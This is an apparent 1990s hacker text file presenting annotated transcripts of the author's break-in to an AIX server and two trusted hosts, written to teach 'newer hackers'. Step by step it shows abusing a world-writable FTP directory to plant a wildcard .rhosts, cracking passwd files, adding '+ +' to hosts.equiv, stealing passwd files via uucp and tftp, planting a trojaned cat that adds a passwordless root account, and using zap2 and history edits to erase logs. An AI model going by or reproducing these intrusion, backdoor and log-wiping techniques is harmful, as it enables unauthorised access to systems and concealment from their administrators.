mail logik
forums
updates

caem
silo
unsupported

outgoing
papers

(log.s)

An Inside Look at Computer Security

I wrote this paper to show some of the newer hackers what hacking really is. These logs are actual transcripts of my security sessions, recorded in better telnet 2 and stripped of anything which could identify the computers I exploited.

The commands I typed in at my computer are bold, and my comments throughout my sessions are underlined. I used dividers to seperate my different protocol sessions on the computer. I am doing all of this from a local box, a friends computer, which I telnetted too. These sessions were strictly evaluation, nothing malicious was done.

Sorry if this is a little over some of your heads, but I explain it better as I actually do it. I exploit a misconfigured ftpd through a writeable user directory, setting universal access to the users r services, giving me access to the system through his account. I use rlogin to exploit my hack, identifying my account as a trusted, possibly local user, which leaves my evaluation less likely to be noticed. I locate the passwd backup, crack it, and su to root, bypassing console security. I transfer a log clearing program, zap2, and remove myself from wtmp dependent software, including who and w. Syslogd hasnt been setup, which saves me alot of time which would have been spent clearing the logs dependent on it. I become trusted by the systems r daemons through hosts.equiv, giving me _complete_ access to the system and all its accounts. I exploit another r setup in case the hosts.equiv exploit is detected and removed. Exploiting a misconfigured uucp, I obtain a trusted system's passwd file, gaining access to that system as well as another one running a misconfigured trivial ftp daemon. I telnet to the system I exploited through uucp, and set a trojan in cat which will give me root. I clear my history, and logout of the uucp exploited system. I clear uulog and my shell history on the main server, and logout of the system.

logik

logik@snip.net

http://www.cyberpunkz.com/logik

 

______________________local box________________________________

 

# ftp main.server

 

_____________________________mainserver ftp[21]________________________________

 

220 FTP server (Version 4.1 Sat Apr 20 13:05:42 CDT 1996) ready.

 

USER anonymous

 

331 Guest log in, send Email address (user@host) as password.

 

PASS

 

230 Anonymous login ready. /* I login to the server as guest */

 

PWD

 

257 PWD command successful.

 

TYPE A

 

200 Type set to A, ASCII transfer mode.

 

PORT 208,211,79,65,8,29

 

200 PORT command successful.

 

CWD /usr/

 

250 cd successful.

 

LIST -alL

 

150 ASCII transfer started.

 

total 3

 

drwxr-xr-x 4 101 1 512 Jun 20 1998 .

 

drwxr-xr-x 4 101 1 512 Jun 20 1998 .. /* Haha! Misconfigured privledges!

 

drwxr-xrwx 2 0 1 512 Jun 20 1998 leon Looks like leon set access a bit too high*/

 

226 ASCII Transfer complete.

 

242 bytes received in 0.066 seconds (3.6 Kbytes/s)

 

CWD /usr/leon/

 

250 cd successful.

 

PUT wcd.rhosts .rhosts /*I exploit the bad permissions by uploading a

 

43 bytes sent in 0.0015 seconds (28 Kbytes/s) small file with a wildcarded '.rhosts' structure. */

 

QUIT

 

221 Goodbye.

 

____________________________local box________________________________

 

# rlogin mainserver.address.removed -l leon

 

______________________mainserver rlogin___________________________________

 

*******************************************************************************

 

* *

 

* *

 

* Welcome to AIX Version 4.2! *

 

* *

 

* *

 

* Please see the README file in /usr/lpp/bos for information pertinent to *

 

* this release of the AIX Operating System. *

 

* *

 

* *

 

*******************************************************************************

 

Last unsuccessful login: Wed Jun 10 13:27:00 CDT 1998 on /dev/pts/1 from address.removed

 

Last login: Wed Jun 10 13:33:20 CDT 1998 on /dev/pts/2 from address.removed

 

 

 

$ csh

 

$ cat /var/adm/sulog /* Hmm, I wonder who's trusted on the system? */

 

SU 01/16 15:49 + pts/0 leon-root

 

SU 01/27 11:04 + pts/0 leon-root

 

SU 06/06 17:57 + tty?? notes-root

 

SU 06/06 17:57 + tty?? leon-root /*Obviously, the user leon… which is great for me since

 

SU 10/01 10:14 + tty?? root-root I already have access to is account*/

 

SU 10/01 10:14 + tty?? root-root

 

 

 

$ cd /etc/security ; ls -a /*Wheres that passwd file?*/

 

 

 

. audit lastlog ogroup ouser user

 

.. environ limits olastlog passwd

 

.ids failedlogin login.cfg olimits portlog /*Heh, right here*/

 

.profile group oenviron opasswd sysck.cfg

 

 

 

$ cat passwd

 

 

 

passwd removed / *Passwd file removed from paper*/

 

 

 

$ su root /*Got the passwd file… now which user will save me some time when clearing logs? Leon!

 

Password: Why? Because leon is a trusted user, possibly local, who, when the sulog is examined,

 

won't be noticed. I crack the passwd file, and su to root…*/

 

 

 

#csh /*I switch to the C shell*/

 

 

 

# w /*and check for users*/

 

 

 

01:38PM up 12 days, 5:36, 4 users, load average: 0.13, 0.09, 0.10

 

User tty login@ idle JCPU PCPU what

 

root 29May98 11 0 0 -

 

root pts/0 02:16PM 22:59 0 0 vi

 

root pts/1 01:36PM 0 0 0 w /*Me of course… I should really remove myself.*/

 

root pts/2 01:33PM 5 0 0 -ksh

 

 

 

#cd /

 

# kermit /*I use the kermit protocol to transfer a aix binary of zap2 from a local system*/

 

Kermit 5A(190) ALPHA.01, 31 Mar 94, for AIX 4.x

 

Type ? or HELP for help

 

Kermit>rece

 

Return to your local Kermit and give a SEND command.

 

 

 

KERMIT READY TO RECEIVE...

 

Kermit>quit

 

 

 

# last root | head /*and check entries for root*/

 

root pts/0 removed1.host.com May 29 02:16 still logged in

 

root pts/2 removed.host.com May 29 07:36 still logged in

 

root pts/1 my.host.com May 29 01:33 still logged in

 

 

 

wtmp begins May 3 14:22

 

# zap2 root /*I use zap2, making myself invisible to programs

 

Zap2! which depend on a wtmp to function correctly,*/

 

 

 

# last root | head

 

root pts/0 removed1.host.com May 29 02:16 still logged in

 

root pts/2 removed.host.com May 29 07:36 still logged in

 

 

 

wtmp begins May 3 14:22

 

 

 

# w

 

01:39PM up 12 days, 5:36, 3 users, load average: 0.13, 0.09, 0.10

 

User tty login@ idle JCPU PCPU what

 

root 29May98 12 0 0 -

 

root pts/0 02:16PM 23:22 0 0 vi /*like 'w'.*/

 

root pts/2 01:33PM 6 0 0 -ksh

 

 

 

# rm zap2* /*I remove zap2*/

 

# cd /etc ; ls -a

 

 

 

. gated.conf ntp.conf securetcpip

 

.. group objrepos security

 

.init.state hosts ogroup sendmail.cf

 

.lmcslock hosts.equiv opasswd sendmail.pid

 

3270.keys hosts.lpd options.file services

 

3270_arab_kyb.map ifconfig passwd slip.hosts

 

3270keys.dtterm inetd.conf ping slip.login

 

3270keys.hft init profile slip.logout

 

acct inittab protocols snmpd.conf

 

aliases isoaliases pse.conf snmpd.peers

 

basecust isobjects pse_tune.conf swapspaces

 

bootpd.dump isoentities qconfig syslog.conf

 

bootptab isomacros qconfig.bin syslog.pid

 

consdef isoservices rc tcp.clean

 

csh.cshrc locks rc.bsdnet telnet.conf

 

csh.login lpp rc.dt totalnet

 

dhcpcd.ini magic rc.lsserver trcfmt

 

dhcprd.cnf map3270 rc.net tsh_profile

 

dhcpsd.cnf mcs0 rc.net.serial utmp

 

dlpi.conf mcsnet rc.powerfail uucp

 

drivers mcstab rc.tcpip vfs

 

dt mcstab.old resolv.conf vg

 

dtappintegrate methods route x_st_mgr

 

dumpdates mib.defs rpc xferlog

 

environment microcode ruhelp xlC.cfg

 

filesystems motd rutils.hlp xtiso.conf

 

 

 

# tail syslog.conf /*I check how the syslogd daemon is setup.*/

 

 

 

# Save mail and news errors of level err and higher in a

 

# special file. /*Syslogd hasn't been configured, and no serious

 

logging is being done*/

 

 

 

# echo + + >> hosts.equiv ; tail hosts.equiv /*Haha! I am now trusted (heh, and actually so is

 

everyone else.)*/

 

# Examples:

 

#

 

# host user allows access to user on host

 

# + user allows access to user on any host

 

# host -user denies access to user on host

 

# -host denies access to all users on host

 

# -@group denies access to all users on hosts in group

 

# +@group1 +@group2 allows access to users in group2 on hosts in group1

 

+ +

 

 

 

# cd notes ; ls -a

 

 

 

. .Xpdefaults .profile lost+found smit.script

 

.. .dt .sh_history notesr4

 

.Xauthority .dtprofile TT_DB smit.log

 

/*In fact, i like being trusted so much, that I become

 

# echo + + > .rhosts trusted through another account, similar to the

 

way I gained access in the first place through ftpd*/

 

# ls -a

 

. .Xpdefaults .profile TT_DB smit.log /*There we go, rhosts is set.*/

 

.. .dt .rhosts lost+found smit.script

 

.Xauthority .dtprofile .sh_history notesr4

 

 

 

# uuname /*Wow, a poorly configured uucp setup. lets see which

 

nremoved1 computers this one is linked too*/

 

nremoved2

 

 

 

# uucp nremoved1\!/etc/passwd\/tmp /*I transfer the passwd file from nremoved1 to the '/tmp'

 

# cat /tmp/passwd ; rm /tmp/passwd directory, examine it, and remove it*/

 

 

 

passwd removed /*Passwd removed from paper*/

 

 

 

# tftp /*Hmm, another weak protocol implementation? Fortunately, yes.

 

tftp> connect nremoved2 I connect via the trivial file transfer protocol to nremoved2, and

 

tftp> get /etc/passwd /tmp/passwd download there passwd file, saving it in /tmp.*/

 

tftp> quit

 

 

 

# cat /tmp/passwd ; rm /tmp/passwd /*Again, I examine the new passwds, and remove the file*/

 

 

 

passwd removed /*Passwd removed from paper*/

 

 

 

telnet nremoved1 /*I crack nremoved1's passwd file,

 

Trying xxx.xxx.x.xx... and telnet to one of the hacked accounts*/

 

Connected to nremoved1.

 

Escape character is '^]'.

 

 

 

_________________nremoved1 telnet [23]_________________________

 

 

 

login: mjake

 

Password:

 

Last login: Thu Aug 2 21:00:45 on ttyp1 from host2.removed

 

 

 

$ cd /bin ; ls -la

 

total 18920

 

drwxr-xr-x 8 root wheel 1024 Aug 15 23:42 .

 

drwxr-xr-x 24 root wheel 512 Aug 16 13:43 ..

 

-r-xr-xr-x 2 root bin 49152 Aug 15 23:42 [

 

-rwxrwxrwx 1 root bin 53248 Aug 15 23:41 cat /*notice how cat's privs are misconfigured,

 

-r-xr-xr-x 1 root bin 53248 Aug 15 23:41 chio making it simple to gain root.*/

 

-r-xr-xr-x 2 root bin 65536 Aug 15 23:41 chmod

 

-r-xr-xr-x 1 root bin 65536 Aug 15 23:41 cp

 

-r-xr-xr-x 3 root bin 241664 Aug 15 23:42 cpio

 

-r-xr-xrwx 1 root bin 245760 Aug 15 23:41 csh

 

-r-xrwxr-x 2 root bin 73728 Aug 15 23:41 date

 

 

 

/*The rest of the output from ls was cutout due to its length and redundancy to this paper.*/

 

 

 

$ mv /bin/cat /bin/cat.save ; echo "echo 'lx::0:0:l-x:/:/bin/tcsh >> /etc/passwd'" > cat\

 

? chmod cat +377

 

/*Wow, I'd just like to thank the administrator at nremoved1for granting me root access

 

through my favorite shell. I also change the mode on my trojan to what the original cat program was*/

 

 

 

$ mv .logout s1

 

$ echo rm .history>.logout /*I'll most likely use this account again, so what the hell.*/

 

$ echo rm .logout>>.logout

 

$ echo mv s1 .logout>>.logout

 

 

 

____________________mainserver rlogin___________________________

 

$ logout

 

Connection closed.

 

 

 

# head /.sh_history > ad ; cat ad > .sh_history ; rm ad;\ /*I clear the only logs which really need

 

? head uulog > ke ; cat ke > uulog ; rm ke;\ clearing right now, my shell history,

 

? head /etc/xferlog > x2 ; cat x2 > /etc/xferlog ; rm x2 uulog, and xferlog.*/

 

# logout

 

Connection closed.

 

______________________________local box____________________________

 

# logout

 

________________________________session ended______________________________

 

 

 

/*and logout of the systems, after gaining root access to two trusted boxes, and a passwd file on another*/

werd to mantis, archa, jabuke, tIs, sOs and everyone else who helped me out when I first started working with security…